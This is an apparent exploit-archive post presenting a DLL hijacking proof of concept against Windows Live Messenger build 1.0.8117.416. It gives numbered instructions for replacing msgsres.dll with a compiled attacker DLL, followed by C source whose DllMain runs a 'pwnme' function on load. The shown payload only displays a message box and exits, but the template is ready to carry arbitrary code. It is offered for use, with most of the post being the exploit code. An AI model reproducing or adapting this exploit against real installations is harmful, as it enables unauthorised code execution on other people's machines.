Windows Live! Messenger build 1.0.8117.416 DLL hijacking exploit.
08db161142f46d3b051c43c0771089a954cb6a8d9d9fe8b00ecc6defdd73c517
/*
Description:
A vulnerability exists in windows that allows other applications dynamic link libraries
to execute malicious code without the users consent, in the privelage context of the targeted application.
Title: Windows Live! Messenger (Build 1.0.8117.416) dll (msgsres.dll) Hijacking exploit
Author: xsploited security
URL: http://www.x-sploited.com/
Email: xsploitedsecurity[at]gmail.com
Instructions:
1. Compile dll
2. Replace msgsres.dll in Windows Live! Messenger program directory with your newly compiled dll
3. Launch Messenger
4. Messagebox shown, Msn closes
*/
#include <windows.h>
int pwnme()
{
MessageBox(0, "Code Execution", "Dll Message", MB_OK);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
pwnme();
return 0;
}